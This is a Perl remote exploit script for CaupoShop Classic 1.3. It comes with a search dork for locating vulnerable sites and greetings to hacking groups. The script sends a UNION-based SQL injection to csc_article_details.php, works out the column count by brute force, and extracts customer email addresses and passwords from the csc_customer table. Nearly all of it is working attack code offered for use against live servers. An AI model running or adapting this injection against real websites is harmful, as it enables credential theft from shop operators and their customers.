#!/usr/bin/perl ###################### # #CaupoShop Classic 1.3 Remote Exploit # ###################### # #Bug by: h0yt3r # #Dork: inurl:csc_article_details.php # Couldnt find a stable dork for this specific Version. #Exploit will only work on correct version. # ## ### ## # #I found this long time ago but never actually shared it. #As the userid's are a bit messy you will only get the top 1 row value. #Change it if you like. # #Gr33tz go to: #thund3r, ramon, b!zZ!t, Free-Hack, Sys-Flaw and of course the pwning h4ck-y0u Team ########
use LWP::UserAgent; my $userAgent = LWP::UserAgent->new;
$server = $ARGV[0]; $dir = $ARGV[1];
print"\n"; if (!$dir) { die "Read Usage!\n"; }
$filename ="csc_article_details.php"; my $url = "http://".$server.$dir.$filename."?";
my $Attack= $userAgent->get($url); if ($Attack->is_success) { print "[x] Attacking ".$url."\n"; } else { print "Couldn't connect to ".$url."!"; exit; }
print "[x] Injecting Black Magic\n";
my @count = ("66666");
for ($i = 6; $i<99; $i++) { my $selectUrl = $url."saArticle[ID]=-275 union select 1,2,3,4, @count"; my $Attack= $userAgent->get($selectUrl); if($Attack->content =~ 66666) { last; } else { push(@count,",66666"); } }
my $Final = $url."saArticle[ID]=-1 union select 1,2,3,concat(1337,email,0x3a,password,1337), @count from csc_customer";
my $Attack= $userAgent->get($Final);
if($Attack->content =~ m/1337(.*?):(.*?)1337/i) { my $login = $1; my $pass = $2; print "[x] Success!\n"; print "[x] Top 1 User Details:\n";
print " Username: ".$login."\n"; print " Password: ".$pass."\n"; } else { print"[x] Something wrong...Version?\n"; exit;
sub usage() { print q { ##################################################### CaupoShop Classic Remote Exploit -Written by h0yt3r- Usage: CC.pl [Server] [Path] Sample: perl CC.pl www.site.com /shop/ ###################################################### };
} #eof